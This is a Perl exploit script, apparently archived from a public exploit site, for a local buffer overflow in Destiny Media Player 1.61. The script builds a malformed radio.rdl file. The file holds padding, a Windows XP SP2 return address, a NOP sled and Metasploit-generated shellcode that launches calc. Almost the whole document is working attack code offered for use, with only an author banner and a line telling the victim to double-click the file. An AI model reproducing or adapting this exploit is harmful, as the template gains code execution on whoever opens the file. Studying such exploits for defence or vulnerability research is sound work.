destinymp-overflow.txt
Posted on 28 April 2009
#!/usr/bin/perl =gnk ============================================================================== _ _ _ _ _ _ / | | | | / | | | | / _ | | | | / _ | |_| | / ___ | |___ | |___ / ___ | _ | IN THE NAME OF /_/ \_ |_____| |_____| /_/ \_ |_| |_| ============================================================================== ____ _ _ _ _ ___ _ __ / ___| | || | | | | / _ | |/ / | | _ | || |_ | | | | | | | | ' / | |_| | |__ _| | | | | |_| | | . \n\____| |_| |_| \_| \___/ |_|\_ A Mad From Iran ============================================================================== Destiny Media Player 1.61 (.rdl) Local Buffer Overflow Exploit ============================================================================== [»] Script:.............[ Destiny Media Player 1.61 ]................... [»] Website:............[ http://www.pirateradio.com ].................. [»] Today:..............[ 26042009 ].................................... [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ]......... ============================================================================== [i] Double click on malformed file. =cut # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com my $Shcode = "x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08". "x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7". "x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb". "x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f". "x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4". "x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6". "x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09". "x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea". "x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86". "x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82"; my $Joke = "G" x 4432; my $Junk = "x90" x 16; my $RA = "x5Dx38x82x7C"; #Windows XP SP2 open(MYFILE,'>>radio.rdl'); print MYFILE $Joke.$RA.$Junk.$Shcode; close(MYFILE);
